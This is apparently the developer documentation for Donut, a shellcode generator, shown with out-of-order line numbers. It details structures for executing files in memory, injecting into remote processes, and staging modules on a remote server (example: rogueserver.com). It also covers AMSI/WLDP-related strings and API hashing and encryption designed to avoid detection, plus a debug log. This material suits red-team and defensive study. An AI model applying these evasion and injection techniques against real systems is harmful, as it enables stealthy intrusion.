498 | DEBUG: inmem_dotnet.c:347:FreeAssembly(): IUnknown::Release | |
499 | DEBUG: inmem_dotnet.c:353:FreeAssembly(): ICorRuntimeHost::Stop | |
500 | DEBUG: inmem_dotnet.c:356:FreeAssembly(): ICorRuntimeHost::Release | |
501 | DEBUG: inmem_dotnet.c:362:FreeAssembly(): ICLRRuntimeInfo::Release | |
502 | DEBUG: inmem_dotnet.c:368:FreeAssembly(): ICLRMetaHost::Release | |
503 | DEBUG: payload.c:171:ThreadProc(): Erasing RW memory for instance | |
504 | DEBUG: payload.c:174:ThreadProc(): Releasing RW memory for instance | |
505 | </pre> | |
506 | ||
507 | <p>Obviously you should be cautious with what files you decide to execute on your machine.</p> | |
508 | ||
509 | </body> | |
510 | </html> |
0 | ||
1 | <html> | |
2 | <body> | |
3 | ||
4 | <h3>API</h3> | |
5 | ||
6 | <ul> | |
7 | <li><code>int DonutCreate(PDONUT_CONFIG pConfig)</code></li> | |
8 | <li><code>int DonutDelete(PDONUT_CONFIG pConfig)</code></li> | |
9 | </ul> | |
10 | ||
11 | <p>When provided with a valid configuration, <code>DonutCreate</code> will generate a shellcode to execute a VBS/JS/EXE/DLL or XSL files in-memory. If the function returns <code>DONUT_ERROR_SUCCESS</code>, the configuration will contain three components:</p> | |
12 | ||
13 | <ol> | |
14 | <li>An encrypted <var>Instance</var></li> | |
15 | <li>An encrypted <var>Module</var></li> | |
16 | <li>A position-independent code (PIC) or shellcode with <var>Instance</var> embedded in it.</li> | |
17 | </ol> | |
18 | ||
19 | <p>The key to decrypt the <var>Module</var> is stored in the <var>Instance</var> so that if a module is discovered on a staging server by an adversary, it should not be possible to decrypt the contents without the instance. <code>DonutDelete</code> will release any memory allocated by a successful call to <code>DonutCreate</code>. The <var>Instance</var> will already be attached to the PIC ready for executing in-memory, but the module may require saving to disk if the PIC will retrieve it from a remote staging server.</p> | |
20 | ||
21 | <h3>Configuration</h3> | |
22 | ||
23 | <p>A configuration requires a target architecture (only x86 and x86-64 are currently supported), a path to a VBS/JS/EXE/DLL or XML file that will be executed in-memory by the shellcode, a namespace/class for a .NET assembly, including the name of a method to invoke and any parameters passed to the method. If the module will be stored on a staging server, a URL is required, but not a module name because that will be generated randomly.</p> | |
24 | ||
25 | <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span> | |
26 | <span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture for shellcode </span> | |
27 | <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for assembly</span> | |
28 | <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace</span> | |
29 | <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to execute</span> | |
30 | <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span><span style='color:#808030; '>(</span>DONUT_MAX_PARAM<span style='color:#808030; '>+</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#808030; '>*</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters passed to method, separated by comma or semi-colon</span> | |
31 | <span style='color:#800000; font-weight:bold; '>char</span> file<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// assembly to create module from </span> | |
32 | <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be on remote http server</span> | |
33 | <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use.</span> | |
34 | <span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk</span> | |
35 | ||
36 | <span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// .NET EXE/DLL, VBS,JS,EXE,DLL,XSL</span> | |
37 | uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span> | |
38 | <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut module</span> | |
39 | ||
40 | <span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL</span> | |
41 | uint64_t inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span> | |
42 | <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut instance</span> | |
43 | ||
44 | uint64_t pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of shellcode</span> | |
45 | <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to PIC/shellcode</span> | |
46 | <span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span> | |
47 | </pre> | |
48 | ||
49 | <table border="1"> | |
50 | <tr> | |
51 | <th>Member</th> | |
52 | <th>Description</th> | |
53 | </tr> | |
54 | <tr> | |
55 | <td><code>arch</code></td> | |
56 | <td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both x86 and amd64. ARM64 will be supported at some point.</td> | |
57 | </tr> | |
58 | <tr> | |
59 | <td><code>domain</code></td> | |
60 | <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly.</td> | |
61 | </tr> | |
62 | <tr> | |
63 | <td><code>cls</code></td> | |
64 | <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</var></td> | |
65 | </tr> | |
66 | <tr> | |
67 | <td><code>method</code></td> | |
68 | <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td> | |
69 | </tr> | |
70 | <tr> | |
71 | <td><code>param</code></td> | |
72 | <td>Contains a list of parameters for the .NET method or DLL function. Each separated by semi-colon or comma.</td> | |
73 | </tr> | |
74 | <tr> | |
75 | <td><code>file</code></td> | |
76 | <td>The path of a supported file type: VBS/JS/EXE/DLL or XSL.</td> | |
77 | </tr> | |
78 | <tr> | |
79 | <td><code>url</code></td> | |
80 | <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should contain the server and path of where module will be stored. e.g: https://www.rogueserver.com/modules/</td> | |
81 | </tr> | |
82 | <tr> | |
83 | <td><code>runtime</code></td> | |
84 | <td>The CLR runtime version to use for the .NET assembly. If none is provided, donut will try read from meta header. If that fails, v4.0.30319 is used by default.</td> | |
85 | </tr> | |
86 | <tr> | |
87 | <td><code>modname</code></td> | |
88 | <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this will contain a randomly generated name for the module that should be used when saving the contents of <code>mod</code> to disk.</td> | |
89 | </tr> | |
90 | <tr> | |
91 | <td><code>mod_type</code></td> | |
92 | <td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td> | |
93 | </tr> | |
94 | <tr> | |
95 | <td><code>mod_len</code></td> | |
96 | <td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td> | |
97 | </tr> | |
98 | <tr> | |
99 | <td><code>mod</code></td> | |
100 | <td>Points to encrypted <var>Module</var>. If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should be saved to file using the <code>modname</code> and accessible via HTTP server.</td> | |
101 | </tr> | |
102 | <tr> | |
103 | <td><code>inst_type</code></td> | |
104 | <td><code>DONUT_INSTANCE_PIC</code> indicates a self-contained payload which means the .NET assembly is embedded in executable code. <code>DONUT_INSTANCE_URL</code> indicates the .NET assembly is stored on a remote server with a URL embedded in the instance.</td> | |
105 | </tr> | |
106 | <tr> | |
107 | <td><code>inst_len</code></td> | |
108 | <td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td> | |
109 | </tr> | |
110 | <tr> | |
111 | <td><code>inst</code></td> | |
112 | <td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td> | |
113 | </tr> | |
114 | <tr> | |
115 | <td><code>pic_len</code></td> | |
116 | <td>The size of data pointed to by <code>pic</code>.</td> | |
117 | </tr> | |
118 | <tr> | |
119 | <td><code>pic</code></td> | |
120 | <td>Points to executable code for the target architecture which also contains an instance. This should be injected into a remote process.</td> | |
121 | </tr> | |
122 | </table> | |
123 | ||
124 | <p>Everything that follows here concerns internal workings of Donut and is not required to generate a payload.</p> | |
125 | ||
126 | <h3>Instance</h3> | |
127 | ||
128 | <p>The position-independent code will always contain an <var>Instance</var> which can be viewed simply as a configuration for the code itself. It will contain all the data that would normally be stored on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. Once the main code executes, it will decrypt the instance before attempting to resolve the address of API functions. If successful, it will check if an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the <code>sig</code> field is hashed using <var>Maru</var> and compared with the value of <code>mac</code>.</p> | |
129 | ||
130 | <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for an instance goes into the following structure</span> | |
131 | <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_INSTANCE <span style='color:#800080; '>{</span> | |
132 | uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of instance</span> | |
133 | DONUT_CRYPT key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// decrypts instance</span> | |
134 | ||
135 | uint64_t iv<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit initial value for maru hash</span> | |
136 | ||
137 | <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span> | |
138 | uint64_t hash<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api hashes</span> | |
139 | <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>addr<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api addresses</span> | |
140 | <span style='color:#696969; '>// include prototypes only if header included from payload.h</span> | |
141 | <span style='color:#004a43; '>      </span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>ifdef</span><span style='color:#004a43; '> PAYLOAD_H</span> | |
142 | <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span> | |
143 | <span style='color:#696969; '>// imports from kernel32.dll or kernelbase.dll</span> | |
144 | LoadLibraryA_t LoadLibraryA<span style='color:#800080; '>;</span> | |
145 | GetProcAddress_t <span style='color:#400000; '>GetProcAddress</span><span style='color:#800080; '>;</span> | |
146 | GetModuleHandleA_t GetModuleHandleA<span style='color:#800080; '>;</span> | |
147 | VirtualAlloc_t <span style='color:#400000; '>VirtualAlloc</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// required to allocate RW memory for instance </span> | |
148 | VirtualFree_t <span style='color:#400000; '>VirtualFree</span><span style='color:#800080; '>;</span> | |
149 | VirtualQuery_t <span style='color:#400000; '>VirtualQuery</span><span style='color:#800080; '>;</span> | |
150 | VirtualProtect_t <span style='color:#400000; '>VirtualProtect</span><span style='color:#800080; '>;</span> | |
151 | Sleep_t <span style='color:#400000; '>Sleep</span><span style='color:#800080; '>;</span> | |
152 | MultiByteToWideChar_t <span style='color:#400000; '>MultiByteToWideChar</span><span style='color:#800080; '>;</span> | |
153 | GetUserDefaultLCID_t <span style='color:#400000; '>GetUserDefaultLCID</span><span style='color:#800080; '>;</span> | |
154 | ||
155 | <span style='color:#696969; '>// imports from oleaut32.dll</span> | |
156 | SafeArrayCreate_t SafeArrayCreate<span style='color:#800080; '>;</span> | |
157 | SafeArrayCreateVector_t SafeArrayCreateVector<span style='color:#800080; '>;</span> | |
158 | SafeArrayPutElement_t SafeArrayPutElement<span style='color:#800080; '>;</span> | |
159 | SafeArrayDestroy_t SafeArrayDestroy<span style='color:#800080; '>;</span> | |
160 | SafeArrayGetLBound_t SafeArrayGetLBound<span style='color:#800080; '>;</span> | |
161 | SafeArrayGetUBound_t SafeArrayGetUBound<span style='color:#800080; '>;</span> | |
162 | SysAllocString_t SysAllocString<span style='color:#800080; '>;</span> | |
163 | SysFreeString_t SysFreeString<span style='color:#800080; '>;</span> | |
164 | LoadTypeLib_t LoadTypeLib<span style='color:#800080; '>;</span> | |
165 | ||
166 | <span style='color:#696969; '>// imports from wininet.dll</span> | |
167 | InternetCrackUrl_t InternetCrackUrl<span style='color:#800080; '>;</span> | |
168 | InternetOpen_t InternetOpen<span style='color:#800080; '>;</span> | |
169 | InternetConnect_t InternetConnect<span style='color:#800080; '>;</span> | |
170 | InternetSetOption_t InternetSetOption<span style='color:#800080; '>;</span> | |
171 | InternetReadFile_t InternetReadFile<span style='color:#800080; '>;</span> | |
172 | InternetCloseHandle_t InternetCloseHandle<span style='color:#800080; '>;</span> | |
173 | HttpOpenRequest_t HttpOpenRequest<span style='color:#800080; '>;</span> | |
174 | HttpSendRequest_t HttpSendRequest<span style='color:#800080; '>;</span> | |
175 | HttpQueryInfo_t HttpQueryInfo<span style='color:#800080; '>;</span> | |
176 | ||
177 | <span style='color:#696969; '>// imports from mscoree.dll</span> | |
178 | CorBindToRuntime_t CorBindToRuntime<span style='color:#800080; '>;</span> | |
179 | CLRCreateInstance_t CLRCreateInstance<span style='color:#800080; '>;</span> | |
180 | ||
181 | <span style='color:#696969; '>// imports from ole32.dll</span> | |
182 | CoInitializeEx_t CoInitializeEx<span style='color:#800080; '>;</span> | |
183 | CoCreateInstance_t CoCreateInstance<span style='color:#800080; '>;</span> | |
184 | CoUninitialize_t CoUninitialize<span style='color:#800080; '>;</span> | |
185 | <span style='color:#800080; '>}</span><span style='color:#800080; '>;</span> | |
186 | <span style='color:#004a43; '>      </span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span> | |
187 | <span style='color:#800080; '>}</span> api<span style='color:#800080; '>;</span> | |
188 | ||
189 | <span style='color:#696969; '>// everything from here is encrypted</span> | |
190 | <span style='color:#800000; font-weight:bold; '>int</span> api_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit hashes of API required for instance to work</span> | |
191 | <span style='color:#800000; font-weight:bold; '>int</span> dll_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the number of DLL to load before resolving API</span> | |
192 | <span style='color:#800000; font-weight:bold; '>char</span> dll_name<span style='color:#808030; '>[</span>DONUT_MAX_DLL<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// a list of DLL strings to load</span> | |
193 | ||
194 | <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span> | |
195 | <span style='color:#800000; font-weight:bold; '>char</span> s<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// amsi.dll</span> | |
196 | uint32_t w<span style='color:#808030; '>[</span><span style='color:#008c00; '>2</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> | |
197 | <span style='color:#800080; '>}</span> amsi<span style='color:#800080; '>;</span> | |
198 | ||
199 | <span style='color:#800000; font-weight:bold; '>char</span> clr<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// clr.dll</span> | |
200 | <span style='color:#800000; font-weight:bold; '>char</span> wldp<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wldp.dll</span> | |
201 | <span style='color:#800000; font-weight:bold; '>char</span> wldpQuery<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpQueryDynamicCodeTrust</span> | |
202 | <span style='color:#800000; font-weight:bold; '>char</span> wldpIsApproved<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpIsClassInApprovedList</span> | |
203 | ||
204 | <span style='color:#800000; font-weight:bold; '>char</span> amsiInit<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiInitialize</span> | |
205 | <span style='color:#800000; font-weight:bold; '>char</span> amsiScanBuf<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanBuffer</span> | |
206 | <span style='color:#800000; font-weight:bold; '>char</span> amsiScanStr<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanString</span> | |
207 | ||
208 | uint16_t wscript<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WScript</span> | |
209 | uint16_t wscript_exe<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript.exe</span> | |
210 | ||
211 | <span style='color:#603000; '>GUID</span> xIID_IUnknown<span style='color:#800080; '>;</span> | |
212 | <span style='color:#603000; '>GUID</span> xIID_IDispatch<span style='color:#800080; '>;</span> | |
213 | ||
214 | <span style='color:#696969; '>// GUID required to load .NET assemblies</span> | |
215 | <span style='color:#603000; '>GUID</span> xCLSID_CLRMetaHost<span style='color:#800080; '>;</span> | |
216 | <span style='color:#603000; '>GUID</span> xIID_ICLRMetaHost<span style='color:#800080; '>;</span> | |
217 | <span style='color:#603000; '>GUID</span> xIID_ICLRRuntimeInfo<span style='color:#800080; '>;</span> | |
218 | <span style='color:#603000; '>GUID</span> xCLSID_CorRuntimeHost<span style='color:#800080; '>;</span> | |
219 | <span style='color:#603000; '>GUID</span> xIID_ICorRuntimeHost<span style='color:#800080; '>;</span> | |
220 | <span style='color:#603000; '>GUID</span> xIID_AppDomain<span style='color:#800080; '>;</span> | |
221 | ||
222 | <span style='color:#696969; '>// GUID required to run VBS and JS files</span> | |
223 | <span style='color:#603000; '>GUID</span> xCLSID_ScriptLanguage<span style='color:#800080; '>;</span> <span style='color:#696969; '>// vbs or js</span> | |
224 | <span style='color:#603000; '>GUID</span> xIID_IHost<span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript object</span> | |
225 | <span style='color:#603000; '>GUID</span> xIID_IActiveScript<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine</span> | |
226 | <span style='color:#603000; '>GUID</span> xIID_IActiveScriptSite<span style='color:#800080; '>;</span> <span style='color:#696969; '>// implementation</span> | |
227 | <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse32<span style='color:#800080; '>;</span> <span style='color:#696969; '>// parser</span> | |
228 | <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse64<span style='color:#800080; '>;</span> | |
229 | ||
230 | <span style='color:#696969; '>// GUID required to run XSL files</span> | |
231 | <span style='color:#603000; '>GUID</span> xCLSID_DOMDocument30<span style='color:#800080; '>;</span> | |
232 | <span style='color:#603000; '>GUID</span> xIID_IXMLDOMDocument<span style='color:#800080; '>;</span> | |
233 | <span style='color:#603000; '>GUID</span> xIID_IXMLDOMNode<span style='color:#800080; '>;</span> | |
234 | ||
235 | <span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL </span> | |
236 | ||
237 | <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span> | |
238 | <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// staging server hosting donut module</span> | |
239 | <span style='color:#800000; font-weight:bold; '>char</span> req<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// just a buffer for "GET"</span> | |
240 | <span style='color:#800080; '>}</span> http<span style='color:#800080; '>;</span> | |
241 | ||
242 | uint8_t sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to hash</span> | |
243 | uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption ok</span> | |
244 | ||
245 | DONUT_CRYPT mod_key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// used to decrypt module</span> | |
246 | uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of module</span> | |
247 | ||
248 | <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span> | |
249 | PDONUT_MODULE p<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for URL</span> | |
250 | DONUT_MODULE x<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for PIC</span> | |
251 | <span style='color:#800080; '>}</span> module<span style='color:#800080; '>;</span> | |
252 | <span style='color:#800080; '>}</span> DONUT_INSTANCE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_INSTANCE<span style='color:#800080; '>;</span> | |
253 | </pre> | |
254 | ||
255 | <h3>Module</h3> | |
256 | ||
257 | <p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p> | |
258 | ||
259 | <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for a module goes in the following structure</span> | |
260 | <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span> | |
261 | <span style='color:#603000; '>DWORD</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE, DLL, JS, VBS, XSL</span> | |
262 | <span style='color:#603000; '>WCHAR</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span> | |
263 | <span style='color:#603000; '>WCHAR</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span> | |
264 | <span style='color:#603000; '>WCHAR</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span> | |
265 | <span style='color:#603000; '>WCHAR</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span> | |
266 | <span style='color:#603000; '>DWORD</span> param_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// number of parameters for DLL/EXE</span> | |
267 | <span style='color:#603000; '>WCHAR</span> param<span style='color:#808030; '>[</span>DONUT_MAX_PARAM<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for DLL/EXE</span> | |
268 | <span style='color:#603000; '>CHAR</span> sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// random string to verify decryption</span> | |
269 | ULONG64 mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption was ok</span> | |
270 | ULONG64 len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of EXE/DLL/XSL/JS/VBS file</span> | |
271 | <span style='color:#603000; '>BYTE</span> data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/XSL/JS/VBS file</span> | |
272 | <span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span> | |
273 | </pre> | |
274 | ||
275 | <h3>API Hashing</h3> | |
276 | ||
277 | <p>A hash function called <em>Maru</em> is used to resolve the address of API at runtime. It uses a Davies-Meyer construction and the SPECK block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5 except only 32-bits of the string length are stored in the buffer instead of 64-bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance and cannot be used for detection of Donut. Future releases will likely support alternative methods of resolving address of API to decrease chance of detection.</p> | |
278 | ||
279 | <h3>Encryption</h3> | |
280 | ||
281 | <p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p> | |
282 | ||
283 | <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span> | |
284 | <span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span> | |
285 | <span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span> | |
286 | <span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span> | |
287 | </pre> | |
288 | ||
289 | <p>Chaskey, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key which is stored in the donut payload. </p> | |
290 | ||
291 | <h3>Debugging payload</h3> | |
292 | ||
293 | <p>The payload is capable of displaying detailed information about each step executing a file in-memory and can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make for both donut.c and payload.c.</p> | |
294 | ||
295 | <pre> | |
296 | nmake debug -f Makefile.msvc | |
297 | make debug -f Makefile.mingw | |
298 | </pre> | |
299 | ||
300 | <p>Use donut to create a payload as you normally would and a file called <code>instance</code> will be saved to disk.</p> | |
301 | ||
302 | <pre> | |
303 | c:\hub\donut>donut -fClass1.dll -cTestClass -mRunProcess -pcalc.exe,notepad.exe | |
304 | ||
305 | [ Donut shellcode generator v0.9.2 | |
306 | [ Copyright (c) 2019 TheWover, Odzhan | |
307 | ||
308 | DEBUG: donut.c:822:DonutCreate(): Entering. | |
309 | DEBUG: donut.c:824:DonutCreate(): Validating configuration and path of file | |
310 | DEBUG: donut.c:840:DonutCreate(): Validating instance type | |
311 | DEBUG: donut.c:880:DonutCreate(): Validating architecture | |
312 | DEBUG: donut.c:277:get_file_info(): Entering. | |
313 | DEBUG: donut.c:286:get_file_info(): Checking extension of Class1.dll | |
314 | DEBUG: donut.c:293:get_file_info(): Extension is ".dll" | |
315 | DEBUG: donut.c:320:get_file_info(): Module is DLL | |
316 | DEBUG: donut.c:327:get_file_info(): Mapping Class1.dll into memory | |
317 | DEBUG: donut.c:222:map_file(): Reading size of file : Class1.dll | |
318 | DEBUG: donut.c:231:map_file(): Opening Class1.dll | |
319 | DEBUG: donut.c:241:map_file(): Mapping 3072 bytes for Class1.dll | |
320 | DEBUG: donut.c:336:get_file_info(): Checking DOS header | |
321 | DEBUG: donut.c:342:get_file_info(): Checking NT header | |
322 | DEBUG: donut.c:348:get_file_info(): Checking IMAGE_DATA_DIRECTORY | |
323 | DEBUG: donut.c:356:get_file_info(): Checking characteristics | |
324 | DEBUG: donut.c:368:get_file_info(): COM Directory found | |
325 | DEBUG: donut.c:384:get_file_info(): Runtime version : v4.0.30319 | |
326 | DEBUG: donut.c:395:get_file_info(): Leaving. | |
327 | DEBUG: donut.c:944:DonutCreate(): Creating module | |
